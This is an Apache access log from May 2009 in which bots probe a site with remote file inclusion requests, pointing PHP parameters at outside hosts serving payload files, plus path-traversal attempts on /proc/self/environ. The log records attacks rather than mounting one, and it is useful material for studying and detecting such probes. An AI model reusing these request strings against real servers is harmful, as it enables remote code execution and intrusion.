207.182.143.50 - - [28/May/2009:06:50:42 -0500] "GET /logs/access_log.1238371200/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:06:50:42 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:06:50:43 -0500] "GET /logs/access_log.1236988800/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:06:50:52 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:06:50:53 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:06:50:53 -0500] "GET /logs/access_log.1238371200/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:06:50:55 -0500] "GET /logs/access_log.1236988800/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:06:54:18 -0500] "GET //include/admin.lib.inc.php?site_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:06:54:18 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:06:54:18 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:06:54:22 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:06:55:32 -0500] "GET /logs/access_log.1242518400/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:06:55:32 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:06:55:32 -0500] "GET /logs/access_log.1238716800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:06:55:32 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:06:55:35 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:06:55:35 -0500] "GET /logs/access_log.1242518400/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:06:55:35 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:06:55:35 -0500] "GET /logs/access_log.1238716800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
219.85.63.226 - - [28/May/2009:06:57:34 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:06:57:34 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
85.214.83.196 - - [28/May/2009:07:00:02 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:00:02 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:00:02 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:00:04 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:00:04 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:00:04 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:07:00:59 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:07:00:59 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:07:00:59 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.219.99.129 - - [28/May/2009:07:01:00 -0500] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:07:01:00 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:07:01:06 -0500] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
66.219.99.129 - - [28/May/2009:07:01:06 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
59.24.49.35 - - [28/May/2009:07:01:25 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:01:25 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:01:25 -0500] "GET //include/admin.lib.inc.php?site_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
59.24.49.35 - - [28/May/2009:07:01:29 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:03:02 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:03:05 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
193.231.42.152 - - [28/May/2009:07:03:33 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:07:03:34 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:07:03:50 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
193.231.42.152 - - [28/May/2009:07:03:50 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
218.249.36.194 - - [28/May/2009:07:03:54 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:07:03:54 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:07:03:54 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
219.85.63.226 - - [28/May/2009:07:04:08 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:07:04:08 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
121.130.29.11 - - [28/May/2009:07:05:25 -0500] "GET //s_loadenv.inc.php?%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:07:05:25 -0500] "GET /logs//s_loadenv.inc.php?%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:07:05:25 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.130.29.11 - - [28/May/2009:07:06:06 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?%5BDOCUMENT_ROOT%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
220.181.7.97 - - [28/May/2009:07:08:27 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.204.254.82 - - [28/May/2009:07:09:05 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
212.204.254.82 - - [28/May/2009:07:09:05 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
212.204.254.82 - - [28/May/2009:07:09:05 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
212.204.254.82 - - [28/May/2009:07:09:05 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
212.204.254.82 - - [28/May/2009:07:09:05 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 337 "-""XXXXXX"
212.204.254.82 - - [28/May/2009:07:09:05 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 342 "-""XXXXXX"
212.204.254.82 - - [28/May/2009:07:09:06 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 337 "-""XXXXXX"
212.204.254.82 - - [28/May/2009:07:09:06 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 342 "-""XXXXXX"
65.55.106.163 - - [28/May/2009:07:10:11 -0500] "GET /logs/access_log.1231891200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.83.196 - - [28/May/2009:07:12:05 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:12:05 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:12:05 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
91.195.124.9 - - [28/May/2009:07:12:09 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.822"
91.195.124.9 - - [28/May/2009:07:12:09 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.822"
85.17.162.28 - - [28/May/2009:07:12:24 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:12:24 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:12:24 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:12:43 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:12:43 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:12:43 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:13:33 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:13:47 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:13:47 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:13:47 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:14:18 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:14:42 -0500] "GET /logs/access_log.1235952000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:14:53 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.119.154.129 - - [28/May/2009:07:17:40 -0500] "GET /logs//shoutbox/expanded.php?conf=http://www.finance-911.com/errors.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
85.119.154.129 - - [28/May/2009:07:17:40 -0500] "GET //shoutbox/expanded.php?conf=http://www.finance-911.com/errors.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
85.214.83.196 - - [28/May/2009:07:18:04 -0500] "GET /logs/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:18:04 -0500] "GET /logs/access_log.1236556800/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:18:04 -0500] "GET /index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:18:04 -0500] "GET /index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:18:04 -0500] "GET /logs/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:18:04 -0500] "GET /logs/access_log.1236556800/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:18:04 -0500] "GET /logs/access_log.1232841600/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:18:05 -0500] "GET /logs/access_log.1232841600/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.108.85.158 - - [28/May/2009:07:19:48 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
89.108.85.158 - - [28/May/2009:07:19:49 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
85.214.83.196 - - [28/May/2009:07:24:17 -0500] "GET /logs/access_log.1236556800/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:24:17 -0500] "GET /index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:24:17 -0500] "GET /logs/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:24:17 -0500] "GET /logs/access_log.1232841600/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:24:44 -0500] "GET /index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:24:44 -0500] "GET /logs/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:24:44 -0500] "GET /logs/access_log.1236556800/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.214.83.196 - - [28/May/2009:07:24:49 -0500] "GET /logs/access_log.1232841600/index.php?body=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:07:27:56 -0500] "GET /errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:07:27:56 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:07:27:56 -0500] "GET /logs/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:07:28:19 -0500] "GET /logs/access_log.1230336000/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:07:28:21 -0500] "GET /logs/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:07:28:21 -0500] "GET /errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.94.125.100 - - [28/May/2009:07:28:21 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.85.63.226 - - [28/May/2009:07:28:27 -0500] "GET /?sourcedir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
219.85.63.226 - - [28/May/2009:07:28:30 -0500] "GET /logs/?sourcedir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
69.94.125.100 - - [28/May/2009:07:28:45 -0500] "GET /logs/access_log.1230336000/errors.php?error=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:28:48 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:28:48 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:28:51 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:28:51 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:28:53 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:07:28:54 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
91.195.124.9 - - [28/May/2009:07:30:29 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.822"
91.195.124.9 - - [28/May/2009:07:30:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.822"
220.79.47.122 - - [28/May/2009:07:30:32 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
220.79.47.122 - - [28/May/2009:07:30:32 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
220.79.47.122 - - [28/May/2009:07:30:32 -0500] "GET /logs/access_log.1238716800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
220.79.47.122 - - [28/May/2009:07:30:32 -0500] "GET /logs/access_log.1242518400/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.106.212 - - [28/May/2009:07:31:38 -0500] "GET /logs/access_log.1184112000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.79.47.122 - - [28/May/2009:07:33:29 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
220.79.47.122 - - [28/May/2009:07:33:29 -0500] "GET /logs/access_log.1242518400/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
